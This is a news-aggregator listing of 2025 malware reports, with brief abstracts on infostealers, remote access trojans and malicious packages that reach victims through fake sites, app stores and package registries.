Malware
June 11, 2025
Rust-based Myth Stealer Malware Spread via Fake Gaming Sites Targets Chrome, Firefox Users Full Text
Abstract
Cybersecurity researchers have identified a new Rust-based information stealer named Myth Stealer, distributed via fraudulent gaming websites and cracked software. The malware targets Chromium and Gecko-based browsers.The Hacker News
June 7, 2025
New Rust-Developed InfoStealer Drains Sensitive Data from Chromium-Based Browsers Full Text
Abstract
A newly discovered Rust-based malware, dubbed RustStealer, poses a significant threat to users of Chromium-based browsers like Google Chrome and Microsoft Edge. It extracts sensitive data such as login credentials, cookies, and browsing history.GBHackers
June 5, 2025
Newly identified wiper malware “PathWiper” targets critical infrastructure in Ukraine Full Text
Abstract
Researchers observed the deployment of PathWiper via a legitimate endpoint administration framework. The attackers likely had access to the admin console, which was used to push both the VBScript and the PathWiper executable to the endpoints.Talos Intelligence
June 5, 2025
Chaos RAT Malware Targets Windows and Linux via Fake Network Tool Downloads Full Text
Abstract
A new variant of the Chaos RAT, an open-source remote access trojan written in Golang and inspired by frameworks like Cobalt Strike and Sliver, is actively targeting both Windows and Linux systems.The Hacker News
June 5, 2025
What 17,845 GitHub Repos Taught Us About Malicious MCP Servers Full Text
Abstract
A recent audit of nearly 18,000 Model Context Protocol (MCP) servers on GitHub revealed that 1,408 repositories may have been intentionally designed for malicious purposes.Virus Total
June 3, 2025
Android malware Crocodilus adds fake contacts to spoof trusted callers Full Text
Abstract
Crocodilus, a sophisticated Android malware, has evolved with new social engineering and evasion techniques. Initially observed in Turkey, it has now expanded globally, targeting users across all continents.Bleeping Computer
June 3, 2025
Malicious NPM Packages Exploit Ethereum Wallets with Obfuscated JavaScript Full Text
Abstract
A new malware campaign is exploiting the NPM ecosystem to target Ethereum wallet users by distributing malicious packages with advanced JavaScript obfuscation techniques.GBHackers
June 2, 2025
Acreed Emerges as Dominant Infostealer Threat Following Lumma Takedown Full Text
Abstract
Acreed, a new infostealer malware strain, has rapidly risen to prominence in the cybercriminal ecosystem following the global takedown of Lumma Stealer (LummaC2) in May 2025.Infosecurity Magazine
June 2, 2025
Hackers Weaponize Free SSH Client PuTTY to Deliver Malware on Windows Full Text
Abstract
A new malware campaign exploits OpenSSH, which has been a default component in Windows since version 1803, to establish stealthy and persistent access on compromised systems.GBHackers
May 29, 2025
New Windows RAT Evades Detection for Weeks Using Corrupted DOS and PE Headers Full Text
Abstract
A newly discovered Remote Access Trojan (RAT) targeting Windows systems employs corrupted DOS and PE headers to evade detection and hinder analysis. The malware was found running undetected for several weeks on a compromised host.The Hacker News
May 28, 2025
Zanubis Android Banking Trojan Evolves with Silent Installation and Credential Theft Capabilities Full Text
Abstract
Zanubis is a sophisticated Android banking Trojan active since 2022, targeting Peruvian financial institutions. It masquerades as legitimate apps to trick users into granting accessibility permissions, enabling full device control.Secure List
May 27, 2025
AppleProcessHub macOS Malware Steals Sensitive Data Using Advanced Evasion and C2 Techniques Full Text
Abstract
A newly identified macOS malware, AppleProcessHub, is actively targeting Apple systems to steal sensitive data. This sophisticated stealer demonstrates advanced evasion and persistence techniques, signaling a growing threat to macOS environments.Kandji
May 27, 2025
GhostSpy Android Malware Grants Full Device Control and Evades Detection Full Text
Abstract
GhostSpy is a newly identified Android malware that poses a severe threat to mobile security by granting attackers full control over infected devices. It employs advanced evasion, persistence, and surveillance techniques.Cyfirma
May 27, 2025
SilverRAT Remote Access Trojan Source Code Leaked on GitHub Full Text
Abstract
The full source code of SilverRAT was briefly leaked on GitHub under the repository “SilverRAT-FULL-Source-Code” before being swiftly removed. The leak included complete build instructions, Visual Studio solution files, and a READMEHackRead
May 26, 2025
De-obfuscating ALCATRAZ Full Text
Abstract
Elastic Security Labs identified a new malware family called DOUBLELOADER, which uses the ALCATRAZ obfuscator for evasion and pairs with the RHADAMANTHYS infostealer. DOUBLELOADER employs multiple obfuscation techniques such as LEA obfuscation.Elastic
May 26, 2025
Case of Larva-25004 Group (Related to Kimsuky) Exploiting Additional Certificate - Malware Signed with Nexaweb Certificate - ASEC Full Text
Abstract
ASEC has discovered malware signed with the certification of Nexaweb Inc. by investigating a file with the same characteristics as the one signed with a Korean company’s certificate.AhnLab
May 22, 2025
AI-Generated TikTok Videos Used to Distribute Infostealer Malware Full Text
Abstract
A new campaign is exploiting TikTok’s vast user base and viral content model to distribute information-stealing malware, including Vidar and StealC. It uses AI-generated videos to socially engineer users into executing malicious PowerShell commands.Infosecurity Magazine
May 20, 2025
Malicious PyPI Packages Exploit Instagram and TikTok APIs to Validate User Accounts Full Text
Abstract
Researchers identified several malicious packages on PyPI and npm that exploit APIs and implant backdoors. checker-SaGaF (2,605 downloads) steinlurks (1,049 downloads) sinnercore (3,300 downloads) dbgpkg (~350 downloads) requestsdev (76 downloads)The Hacker News
May 20, 2025
Malicious Koishi Chatbot Plugin Exfiltrates Messages Trigger… Full Text
Abstract
A malicious npm package, koishi-plugin-pinhaofa, is targeting Koishi chatbot frameworks. Disguised as a spelling autocorrect plugin, it embeds a backdoor that exfiltrates messages containing 8-character hexadecimal strings to a hardcoded QQ account.Socket
May 16, 2025
Printer company provided infected software downloads for half a year Full Text
Abstract
This investigation revealed that the vendor's official software downloads were infected with multiple strains of malware, including the XRed backdoor and a new clipbanker virus called SnipVex.Cyware
May 15, 2025
Malicious npm Package Leverages Unicode Steganography, Google Calendar as C2 Dropper Full Text
Abstract
A newly discovered malicious npm package, os-info-checker-es6, masquerades as a utility for retrieving OS information but is designed to stealthily deliver a next-stage payload.The Hacker News
May 15, 2025
TransferLoader Malware Loader Deploys Morpheus Ransomware Using Obfuscated Backdoor and IPFS-Based C2 Full Text
Abstract
TransferLoader is a newly identified malware loader active since at least February 2025. It comprises three main components—a downloader, a backdoor loader, and a backdoor—each employing advanced anti-analysis and obfuscation techniques.ZScaler
May 15, 2025
Researchers Uncover Malicious .desktop File Campaign Targeting Linux Systems Full Text
Abstract
Researchers have identified a surge in malicious `.desktop` files targeting Linux systems. These files exploit standard desktop behaviors to execute hidden commands and download malware.Google Cloud Community
May 14, 2025
Katz Stealer Malware Hits 78+ Chromium and Gecko-Based Browsers Full Text
Abstract
Katz Stealer is a newly identified infostealer malware targeting over 78 Chromium and Gecko-based browser variants. It is capable of extracting sensitive data including credentials, cookies, CVV2 codes, OAuth tokens, and cryptocurrency wallets.GBHackers
May 14, 2025
DarkCloud Stealer: Comprehensive Analysis of a New Attack Chain That Employs AutoIt Full Text
Abstract
DarkCloud Stealer is a sophisticated infostealer malware active since 2022 and advertised on hacking forums as early as January 2023. It has been used in targeted attacks against government organizations.Palo Alto Networks
May 13, 2025
Unpacking PyInstaller Malware on macOS Full Text
Abstract
A newly discovered macOS infostealer leverages PyInstaller, an open-source Python bundler, to deploy malicious Mach-O binaries. The malware bypasses traditional detection mechanisms and supports both x86_64 and arm64 architectures.JAMF
May 13, 2025
Chihuahua Stealer: A new Breed of Infostealer Full Text
Abstract
Chihuahua Stealer is a newly identified .NET-based infostealer that employs a multi-stage infection chain, advanced obfuscation, and stealth techniques to exfiltrate sensitive browser and cryptocurrency wallet data.GData Software
May 12, 2025
“PupkinStealer” – .NET Malware Steals Browser Data and Exfiltrates via Telegram Full Text
Abstract
A newly identified .NET-based infostealer named PupkinStealer has emerged as a significant threat targeting Windows systems. First observed in April 2025, this malware is designed to harvest sensitive data.GBHackers
May 9, 2025
Stealthy .NET Malware: Hiding Malicious Payloads as Bitmap Resources Full Text
Abstract
A recent malware campaign leverages steganography to embed malicious payloads within bitmap resources of 32-bit .NET applications. These payloads are delivered via malspam targeting the financial sector in Türkiye and the logistics sector in Asia.Palo Alto Networks
May 7, 2025
Lampion Is Back With ClickFix Lures Full Text
Abstract
A newly uncovered campaign by the Lampion banking malware group has targeted Portuguese organizations in the government, finance, and transportation sectors. Lampion is an info stealer known for stealing sensitive banking credentials.Palo Alto Networks
May 7, 2025
Malicious PyPI Package Targets Discord Developers with Remot… Full Text
Abstract
A malicious Python package named discordpydebug was uploaded to PyPI, posing as a debugging tool for Discord bot developers. Despite lacking a README or documentation, it was downloaded over 11,000 times.Socket
May 5, 2025
StealC V2: ThreatLabz Unveils the Evolution of a Stealthy Info-Stealer and Malware Loader Full Text
Abstract
StealC V2, introduced in March 2025, utilizes a JSON-based network protocol with RC4 encryption implemented in recent variants. StealC V2 supports loader options that can deliver Microsoft Software Installer (MSI) packages, and PowerShell scripts.Security Online
April 30, 2025
New Gremlin Infostealer Distributed on Telegram Full Text
Abstract
Gremlin Stealer is a newly identified C#-based infostealer malware actively promoted on Telegram since March 2025. It targets Windows systems and is capable of harvesting a broad range of sensitive data.Infosecurity Magazine
April 30, 2025
Yet Another NodeJS Backdoor (YaNB): A Modern Challenge Full Text
Abstract
Trustwave SpiderLabs uncovered a resurgence of malicious campaigns in March 2025 that exploit deceptive CAPTCHA verifications to deploy NodeJS-based backdoors. The campaign is referred to as "Yet Another NodeJS Backdoor (YANB)."TrustWave
April 30, 2025
In Plain Sight: Uncovering SuperShell & Cobalt Strike from an Open Directory Full Text
Abstract
Hunt researchers uncovered a malicious server, revealing SuperShell C2 payloads and a Linux ELF Cobalt Strike beacon. The server also hosted reconnaissance tools, highlighting the sophistication and layered nature of modern cyber threats.Hunt
April 29, 2025
Technical Malware Analysis Report: Python-based RAT Malware Full Text
Abstract
A newly discovered Python-based Remote Access Trojan (RAT) leverages Discord as its command-and-control (C2) platform, transforming the popular communication tool into a hub for malicious operations.Cyfirma
April 29, 2025
HANNIBAL Stealer: A Rebranded Threat Born from Sharp and TX Lineage - CYFIRMA Full Text
Abstract
Hannibal Stealer is a newly surfaced malware, identified as a cracked and rebranded variant of the Sharp and TX stealers, promoted by the reverse engineering group ‘llcppc_reverse.’Cyfirma
April 25, 2025
Chrome Extension Uses AI Engine to Act Without User Input Full Text
Abstract
Security researchers from ExtensionTotal have discovered a Chrome extension capable of interacting with local Model Context Protocol (MCP) servers without user permission or detection by Chrome’s security mechanisms.Infosecurity Magazine
April 24, 2025
DslogdRAT Malware Installed in Ivanti Connect Secure - JPCERT/CC Eyes Full Text
Abstract
A new malware, DslogdRAT, was deployed via a zero-day vulnerability in Ivanti Connect Secure during targeted attacks in Japan. The malware was installed using a Perl-based CGI web shell and exhibits advanced command-and-control capabilities.JPCert
April 22, 2025
New Malware Mimics Cisco Webex to Target Users in-the-Wild Full Text
Abstract
According to researchers, the attack begins when victims are persuaded to click on malicious meeting links that exploit a vulnerability in Cisco Webex App’s custom URL parser.Cybersecurity News
April 21, 2025
Hackers Claim to Sell ‘Baldwin Killer’ Malware That Evades AV and EDR Full Text
Abstract
A notorious threat actor has allegedly begun selling “Baldwin Killer,” a sophisticated malware toolkit designed to bypass leading antivirus (AV) and endpoint detection and response (EDR) systems.GBHackers
April 21, 2025
New Android malware steals your credit cards for NFC relay attacks Full Text
Abstract
A new malware-as-a-service (MaaS) platform named 'SuperCard X' has emerged, targeting Android devices via NFC relay attacks that enable point-of-sale and ATM transactions using compromised payment card data.Bleeping Computer
April 19, 2025
New payment-card scam involves a phone call, some malware and a personal tap Full Text
Abstract
A new fraud campaign tracked by Cleafy in Italy leverages Android malware, social engineering, and NFC technology to steal payment card data. The malware, dubbed SuperCard X, is part of a malware-as-a-service (MaaS) operation .The Record
April 19, 2025
KeyPlug Malware Server Leak Exposes Fortinet Firewall and VPN Exploitation Tools Full Text
Abstract
Cybersecurity researchers uncovered a RedGolf/APT41 server inadvertently exposed for less than 24 hours, offering a rare glimpse into an active staging ground used by the threat actor.GBHackers
April 18, 2025
npm Malware Targets Telegram Bot Developers with Persistent … Full Text
Abstract
A new supply chain attack has been uncovered targeting Telegram bot developers via typosquatted npm packages. These malicious packages mimic the legitimate `node-telegram-bot-api` library.Socket
April 17, 2025
Unmasking the new XorDDoS controller and infrastructure Full Text
Abstract
Cisco Talos observed an existing DDoS malware known as XorDDoS, continuing to spread globally between November 2023 and February 2025. A significant finding shows that over 70 percent of attacks using XorDDoS targeted the U.S.Talos
April 17, 2025
Inside Gamaredon’s PteroLNK: Dead Drop Resolvers and evasive Infrastructure Full Text
Abstract
Researchers unearthed the PteroLNK variant used by the Russian-nexus threat group, Gamaredon. The group targets Ukrainian entities, focusing on government, military, and critical infrastructure sectors.Harfang Lab
April 16, 2025
Chinese Android Phones Shipped with Fake WhatsApp, Telegram Apps Targeting Crypto Users Full Text
Abstract
Cheap Android smartphones manufactured by Chinese companies have been observed pre-installed with trojanized apps masquerading as WhatsApp and Telegram that contain cryptocurrency clipper functionality as part of a campaign since June 2024.The Hacker News
April 16, 2025
New BPFDoor Controller Enables Stealthy Lateral Movement in Linux Server Attacks Full Text
Abstract
Researchers unearthed a new controller component associated with a known backdoor called BPFDoor as part of cyber attacks targeting telecommunications, finance, and retail sectors in South Korea, Hong Kong, Myanmar, Malaysia, and Egypt in 2024.The Hacker News
April 16, 2025
Malicious PyPI Package Targets MEXC Trading API to Steal Credentials and Redirect Orders Full Text
Abstract
Cybersecurity researchers have disclosed a malicious package uploaded to the Python Package Index (PyPI) repository that's designed to reroute trading orders placed on the MEXC cryptocurrency exchange to a malicious server and steal tokens.The Hacker News
April 15, 2025
PasivRobber Malware Emerges, Targeting macOS to Steal Data From Systems and Apps Full Text
Abstract
Identified on March 13, 2025, after a suspicious file named “wsus” was uploaded to VirusTotal, PasivRobber is a multi-component threat designed to steal a wide range of data from infected systems and popular applications.GBHackers
April 15, 2025
Unmasking Xworm Payload Execution Path through Jailbreaking a Malicious JScript Loader Full Text
Abstract
Security researchers are analyzing a sophisticated malware delivery mechanism that uses a JScript loader to deploy different payloads based on the victim’s geographic location.GBHackers
April 15, 2025
TROX Stealer: A deep dive into a new Malware as a Service (MaaS) attack campaign Full Text
Abstract
TROX Stealer, first seen by Sublime Security in December 2024, appears to be an obscure and undocumented information stealer with capabilities to exfiltrate sensitive data.Sublime
April 10, 2025
Atomic and Exodus Crypto Wallets Targeted in Malicious NPM Package Campaign Full Text
Abstract
The new NPM package, pdf-to-office, masquerades as a utility for converting PDF files to Word documents. Instead, it injects malicious code into cryptocurrency wallet software associated with Atomic Wallet and Exodus.Reversing Labs
April 5, 2025
Lazarus Expands Contagious Interview Campaign With 11 New NPM Packages Containing Malware Loaders and Bitbucket Payloads Full Text
Abstract
These latest malware samples employ hexadecimal string encoding to evade automated detection systems and manual code audits, signaling a variation in the threat actors’ obfuscation techniques.Socket
March 31, 2025
Researchers Uncover the Shelby Malware Family Abusing GitHub for Command and Control Full Text
Abstract
Researchers found unused code and dynamic payload loading, hinting at the malware being under active development, indicating future updates may address any issues with contemporary versions.Elastic
March 31, 2025
Python-based RAT Abuses Discord API to Execute Data Theft Attacks Full Text
Abstract
The Python-based Discord Remote Access Trojan (RAT) leverages Discord’s API as a C2 server to execute arbitrary system commands, steal sensitive information, capture screenshots, and manipulate both local machines and Discord servers.Cyfirma
March 31, 2025
Python-based Triton RAT Found Targeting Roblox Credentials Full Text
Abstract
Cado Security Labs identified a Python Remote Access Tool (RAT) named Triton RAT. The open source RAT is available on GitHub and allows users to remotely access and control a system using Telegram.Cado Security
March 31, 2025
New Android Trojan Crocodilus Abuses Accessibility to Steal Banking and Crypto Credentials Full Text
Abstract
As with other banking trojans of its kind, the malware is designed to facilitate device takeover (DTO) and ultimately conduct fraudulent transactions. An analysis of the source code and the debug messages revealed that the author is Turkish-speaking.The Hacker News
March 29, 2025
Stealthy Snake Keylogger Malware Targets Credentials in Sophisticated Attacks Full Text
Abstract
A new report from Seqrite Labs detailed a malicious campaign employing SnakeKeylogger, an info-stealing malware known for its advanced techniques and ability to evade detection.Security Online
March 28, 2025
PJobRAT Makes a Comeback, Takes Another Crack at Chat Apps Full Text
Abstract
In the latest campaign, Sophos X-Ops researchers found PJobRAT samples disguising themselves as instant messaging apps. As per their telemetry, all the victims appeared to be based in Taiwan.Sophos
March 27, 2025
Malware Found on npm Infecting Local Package With Reverse Shell Full Text
Abstract
In March, two harmful packages called ethers-provider2 and ethers-providerz were added to npm. They hid their malicious payload and modified the legitimate npm package ethers, which led to a reverse shell.Reversing Labs
March 27, 2025
MacOS Malware ReaderUpdate Adds New Variants Written in Crystal, Nim, Rust, and Go Full Text
Abstract
The ReaderUpdate malware, which previously went relatively unnoticed, now includes variants written in Crystal, Nim, Rust, and most recently, Go, in addition to the original compiled Python binary.Sentinel One
March 26, 2025
Hackers Using E-Crime Tool Atlantis AIO for Credential Stuffing on Over 140 Platforms Full Text
Abstract
Atlantis AIO offers threat actors the ability to launch credential stuffing attacks at scale via pre-configured modules for targeting a range of platforms and cloud-based services, thereby facilitating fraud, data theft, and account takeovers.The Hacker News
March 25, 2025
New Android Malware Campaigns Evading Detection Using Cross-Platform Framework .NET MAUI Full Text
Abstract
The McAfee Mobile Research Team discovered malware campaigns abusing .NET MAUI, a cross-platform development framework, to evade detection. These threats disguise themselves as legitimate apps, targeting users to steal sensitive information.March 25, 2025
Rilide Stealer Disguises as a Browser Extension to Steal Crypto Full Text
Abstract
Pulsedive Threat Research identified multiple delivery mechanisms used to distribute Rilide. Phishing websites are the most common method, but newer versions have been adapted to work with Chrome Extension Manifest V3.Security Online
March 25, 2025
AMOS Stealer Revamped to Serve as a Fully Undetected macOS Threat Full Text
Abstract
The malware is distributed via a DMG file named Installer_v2.7.8.dmg, leveraging a clever trick to bypass macOS Gatekeeper. Victims are instructed to right-click and select “Open,” sidestepping Apple’s verification mechanism.Security Online
March 24, 2025
Microsoft Trusted Signing service abused to code-sign malware Full Text
Abstract
Signed malware has the advantage of potentially bypassing security filters that would normally block unsigned executable files, or at least treat them with less suspicion.Bleeping Computer
March 22, 2025
Steam Pulls Game Demo Infecting Windows With Info-Stealing Malware Full Text
Abstract
Valve has removed from its Steam store the game title 'Sniper: Phantom's Resolution' following multiple users reporting that the demo installer infected their systems with information stealing malware.Bleeping Computer
March 20, 2025
New Arcane Info-stealer Infects YouTube, Discord Users via Game Cheats Full Text
Abstract
The campaign distributing Arcane Stealer relies on YouTube videos promoting game cheats and cracks, tricking users into following a link to download a password-protected archive.Bleeping Computer
March 19, 2025
FIN7’s New Stealth Weapon, Anubis Backdoor, Emerges in the Wild Full Text
Abstract
The Anubis Backdoor is designed to provide attackers with full control over infected machines, employing evasion techniques to bypass traditional security measures. It allows attackers to execute remote shell commands and various system operations.Security Online
March 19, 2025
New ‘Rules File Backdoor’ Attack Lets Hackers Inject Malicious Code via AI Code Editors Full Text
Abstract
Cybersecurity researchers have disclosed details of a new supply chain attack vector dubbed Rules File Backdoor that affects AI-powered code editors like GitHub Copilot and Cursor, causing them to inject malicious code.The Hacker News
March 18, 2025
Microsoft Warns of New StilachiRAT Malware Used for Crypto Theft, Reconnaissance Full Text
Abstract
While the malware (dubbed StilachiRAT) hasn't yet reached widespread distribution, Microsoft says it decided to publicly share indicators of compromise and mitigation guidance to help network defenders detect this threat and reduce its impact.Bleeping Computer
March 15, 2025
Fake CAPTCHA Malware Exploits Windows Users to Run PowerShell Commands Full Text
Abstract
The attack chain comprises several stages in which attackers use a deceptive fake CAPTCHA prompt to trick users into executing a malicious PowerShell command, making it appear as a legitimate part of the verification process.GBHackers
March 14, 2025
JSPSpy Combined With Custom File Management Tool in Webshell Infrastructure Full Text
Abstract
Hunt researchers recently identified a cluster of JSPSpy web shell servers with an unexpected addition: Filebroser, a rebranded version of the open-source File Browser file management project.Hunt
March 14, 2025
New Sobolan Malware Campaign Targets Jupyter Notebooks and Cloud-Native Environments Full Text
Abstract
The Sobolan malware campaign utilizes a multi-stage attack chain to infiltrate and compromise systems, deploying cryptominers and establishing persistent backdoors for long-term control.Security Online
March 13, 2025
DCRat Malware Exploits YouTube to Hijack User Credentials Full Text
Abstract
Analysts have identified 34 different plugins associated with DCRat, enabling dangerous functionalities such as keystroke logging, webcam access, file theft, and password exfiltration.Cyber Press
March 12, 2025
Fake Binance Wallet Email Promises TRUMP Coin, Installs Malware Full Text
Abstract
The phishing emails, sent under the name “Binance,” urge recipients to claim newly launched Trump-themed cryptocurrency. A link directs users to a counterfeit Binance website that mimics official branding.HackRead
March 12, 2025
PlayPraetor Malware Targets Android Users via Fake Play Store Apps to Steal Passwords Full Text
Abstract
The primary motive behind these attacks is financial gain. Threat actors exploit stolen data by draining funds from compromised accounts, making unauthorized transactions, or selling the accounts on dark web marketplaces.GBHackers
March 11, 2025
Fortinet Identifies Malicious Packages in the Wild: Insights and Trends from November 2024 Onward Full Text
Abstract
1,082 packages employed minimal code within a low file count, around 1,052 packages utilized suspicious installation scripts, 1,043 instances lacked repository URLs, and 974 packages contained suspicious URLs for C2 servers communication.Fortinet
March 11, 2025
Phantom Goblin Malware: Stealthy Attacks via VSCode Tunnels Full Text
Abstract
A new malware campaign, dubbed Phantom Goblin, has been uncovered. This attack uses social engineering tactics to trick victims into executing a malicious LNK file, initiating a multi-stage attack aimed at stealing browser credentials.Security Online
March 11, 2025
A Deep Dive into Strela Stealer and how it Targets European Countries Full Text
Abstract
The Strela Stealer is an infostealer that exfiltrates email log-in credentials and has been in the wild since late 2022. It is a precisely focused malware, targeting Mozilla Thunderbird and Microsoft Outlook on systems in chosen European countries.TrustWave
March 10, 2025
FIN7, FIN8, and Others Use Ragnar Loader for Persistent Access and Ransomware Operations Full Text
Abstract
Threat hunters have shed light on a "sophisticated and evolving malware toolkit" called Ragnar Loader that's used by various cybercrime and ransomware groups like Ragnar Locker (aka Monstrous Mantis), FIN7, FIN8, and Ruthless Mantis (ex-REvil).The Hacker News
March 8, 2025
Malicious Chrome Extensions Can Spoof Password Managers in New Attack Full Text
Abstract
A newly devised "polymorphic" attack allows malicious Chrome extensions to morph into other browser extensions, including password managers, crypto wallets, and banking apps, to steal sensitive information.Bleeping Computer
March 8, 2025
Cybercriminals Exploit YouTubers to Spread SilentCryptoMiner on Windows Systems Full Text
Abstract
SilentCryptoMiner, based on the open-source XMRig miner, is capable of mining multiple cryptocurrencies using various algorithms. It employs process hollowing techniques to inject miner code into system processes for stealth.GBHackers
March 5, 2025
Lumma Stealer Expands Attack Surface with Fake Booking Sites and CAPTCHA Tricks Full Text
Abstract
The campaign’s infection chain was first detected in early 2025, targeting users booking trips to Palawan, Philippines. Within a week, the attack vector shifted to a hotel in Munich, Germany, indicating a broader global focus on travel-related sites.Security Online
March 1, 2025
New Malware Campaign Uses Fake “Mods” and “Cracks” to Steal User Data Full Text
Abstract
A sophisticated malware campaign leveraging GitHub repositories disguised as game modifications and cracked software has been uncovered, exposing a dangerous convergence of social engineering tactics and automated credential harvesting.GBHackers
February 28, 2025
Fake WordPress Plugin Impacts SEO by Injecting Casino Spam Full Text
Abstract
The attackers used multiple stealthy methods to evade detection: naming the plugin an innocent-sounding name, and hiding it in the WordPress plugins directory versus a core file to avoid being found by integrity checks.Sucuri
February 28, 2025
VSCode Extensions With 9 Million Installs Pulled Over Security Risks Full Text
Abstract
Microsoft has removed two popular VSCode extensions, 'Material Theme – Free' and 'Material Theme Icons – Free,' from the Visual Studio Marketplace for allegedly containing malicious code.Bleeping Computer
February 26, 2025
New Auto-Color Linux Backdoor Targets North American Governments, Universities Full Text
Abstract
A previously undocumented Linux backdoor dubbed 'Auto-Color' was observed in attacks between November and December 2024, targeting universities and government organizations in North America and Asia.Bleeping Computer
February 24, 2025
New Zhong Stealer Malware Exploit Zendesk to Attack Fintech and Cryptocurrency Industries Full Text
Abstract
The attackers masquerade as customers, leveraging social engineering tactics to trick support agents into downloading malicious files. The attack begins with the creation of fraudulent support tickets by attackers using newly registered accounts.GBHackers
February 24, 2025
Null-AMSI Bypasses Security Measures to Deploy AsyncRAT Payload Full Text
Abstract
Once the AsyncRAT payload is loaded, it establishes control over the victim’s system, allowing the attacker to remotely control the machine, steal data, install additional malware, or launch further attacks.The Cyber Express
February 24, 2025
GhostSocks - Lumma’s Partner in Proxy Full Text
Abstract
GhostSocks, a Golang-based SOCKS5 backconnect proxy malware, was first identified in October 2023 when it was advertised on a Russian-language criminal forum, and supports Microsoft Windows alongside Linux.Infrawatch
February 22, 2025
SpyLend Android malware downloaded 100,000 times from Google Play Full Text
Abstract
An Android malware app called SpyLend has been downloaded over 100,000 times from Google Play, where it masqueraded as a financial tool but became a predatory loan app for those in India.Bleeping Computer
February 20, 2025
New FrigidStealer Malware Infects Macs via Fake Browser Updates Full Text
Abstract
FrigidStealer is a Go-based malware built with the WailsIO framework to make the installer appear legitimate during infection. The malware extracts saved cookies, login credentials, and password-related files stored in Safari or Chrome on macOS.Bleeping Computer
February 20, 2025
Rhadamanthys Stealer Being Distributed Through MSC Files Full Text
Abstract
The malicious MSC file is often disguised as a harmless document, such as a Word file. When the victim opens the file, it downloads and executes a PowerShell script from an external server. This script then decodes and runs the Rhadamanthys Stealer.ASEC
February 20, 2025
Malicious Signal, Line, and Gmail Installers Target Chinese-Speaking Users with Backdoors Full Text
Abstract
The attackers rely on search engine optimization (SEO) poisoning to direct users to fraudulent download pages for apps like Signal, Line, and Gmail, which deliver ZIP files containing executable malware.Hunt
February 20, 2025
Highly Obfuscated .NET sectopRAT Disguises as Chrome Extension Full Text
Abstract
Recently, cybersecurity researchers uncovered a new campaign where sectopRAT disguises itself as a legitimate Google Chrome extension named “Google Docs,” further amplifying its stealth and data-theft capabilities.GBHackers
February 18, 2025
Earth Preta Mixes Legitimate and Malicious Components to Sidestep Detection Full Text
Abstract
Earth Preta’s malware, a variant of the TONESHELL backdoor, is sideloaded with a legitimate Electronic Arts application and communicates with a command-and-control server for data exfiltration.Trend Micro
February 18, 2025
Microsoft Warns of New XCSSET macOS Malware Variant Used for Cryptocurrency Theft Full Text
Abstract
A new variant of the XCSSET macOS modular malware has emerged in attacks that target users' sensitive information, including digital wallets and data from the legitimate Notes app.Bleeping Computer
February 17, 2025
PirateFi game on Steam caught installing password-stealing malware Full Text
Abstract
A free-to-play game named PirateFi in the Steam store has been distributing the Vidar infostealing malware to unsuspecting users. Statistics on the title's page shows that up to 1,500 individuals may be impacted.Bleeping Computer
February 13, 2025
Magento Credit Card Stealer Disguised in an Tag Full Text
Abstract
Analyzing the decoded version of the malicious script reveals that it first checks whether the user is on the checkout page and ensures the script hasn’t run yet in the current session.Sucuri
February 11, 2025
Malicious ML Models Discovered on Hugging Face Platform Full Text
Abstract
Researchers at Reversing Labs have discovered two malicious machine learning (ML) models available on Hugging Face, the leading hub for sharing AI models and applications.ReversingLabs
February 10, 2025
Flesh Stealer Snoops on Web Browsers and Cryptocurrency Wallets Full Text
Abstract
Flesh Stealer has been actively promoted on Discord, Telegram channels, and underground forums like Pyrex Guru. Employing Base64 obfuscation techniques to conceal its functions and strings, the stealer first emerged in August 2024.Cyfirma
February 6, 2025
New ValleyRAT Malware Variant Spreads via Fake Chrome Downloads Full Text
Abstract
Cybersecurity researchers at Morphisec Threat Lab discovered a new version of the sophisticated ValleyRAT malware distributed through various channels including phishing emails, instant messaging platforms, and compromised websites.HackRead
February 5, 2025
AsyncRAT Abusing Python and Cloudflare Tunnels for Stealthy Malware Delivery Full Text
Abstract
AsyncRAT, known for its asynchronous communication capabilities, enables attackers to control compromised systems, exfiltrate sensitive data, and execute commands undetected.GBHackers
February 4, 2025
Malicious Package Exploits Go Module Proxy Caching for Persistence Full Text
Abstract
Socket researchers discovered a malicious typosquat package in the Go ecosystem, impersonating the widely used BoltDB database module (github.com/boltdb/bolt), a tool trusted by many organizations including Shopify and Heroku.Socket
February 4, 2025
Fully Undetectable macOS Backdoor Called “Tiny FUD” Discovered Full Text
Abstract
This stealthy macOS malware leverages process name manipulation, DYLD injection, and C2-based command execution to operate undetected, making it a significant threat to Apple users.Security Online
February 4, 2025
DeepSeek AI Tools Impersonated by Info-Stealer Malware on PyPI Full Text
Abstract
According to Positive Technologies researchers who discovered the campaign and reported it to PyPI, the packages posing as Python clients for DeepSeek AI were infostealers that stole data from developers who utilized them.Bleeping Computer
January 31, 2025
Technical Analysis of Xloader Versions 6 and 7 Full Text
Abstract
Xloader is known for its ability to steal sensitive information from web browsers, email clients, and FTP applications, as well as deploy second-stage payloads on infected systems.ZScalar
January 20, 2025
Weaponized Software Targets Chinese-Speaking Organizations Full Text
Abstract
This campaign stands out due to its unique focus on Chinese-speaking victims and organizations across China, Hong Kong, and Taiwan. It demonstrates an attack that broadly targets one specific demographic.INTEZER
January 18, 2025
Malicious PyPI Package ‘pycord-self’ Targets Discord Developers with Token Theft and Backdoor Exploit Full Text
Abstract
The malicious package, named pycord-self, mimics the legitimate discord.py-self library, a widely used Python wrapper for the Discord user API. The legitimate package was released on April 8, 2023, whereas the malicious one appeared on June 20, 2024.Socket
January 10, 2025
New Banshee Stealer Variant Bypasses Antivirus with Apple’s XProtect-Inspired Encryption Full Text
Abstract
Offered under a malware-as-a-service (MaaS) model to other cybercriminals for $3,000 a month, Banshee Stealer is capable of harvesting data from web browsers, cryptocurrency wallets, and files matching specific extensions.The Hacker News
January 10, 2025
Malicious npm Packages Target Solana Private Keys and Drain Victims’ Wallets Full Text
Abstract
The packages – @async-mutex/mutex, dexscreener, solana-transaction-toolkit, and solana-stable-web-huks – exploit typosquatting to deceive developers into downloading them. These packages steal sensitive data and drain victims’ wallets.Socket
January 6, 2025
Malicious Packages on npm, PyPI, and RubyGems Weaponize OAST Techniques for Data Exfiltration and Recon Full Text
Abstract
Over the last year, researchers at Socket observed and identified malicious packages leveraging Out-of-Band Application Security Testing (OAST) services such as oastify[.]com and oast[.]fun to exfiltrate sensitive data to attacker-controlled servers.Socket
January 6, 2025
NonEuclid RAT Combines Advanced Stealth, Anti-Detection, and Ransomware Capabilities Full Text
Abstract
Developed in C# for the .NET Framework 4.8, NonEuclid is built to evade detection and offers a suite of advanced capabilities, including ransomware encryption, privilege escalation, and anti-detection mechanisms.Cyfirma
January 4, 2025
Fake EditThisCookie Chrome Extension Steals User Data Full Text
Abstract
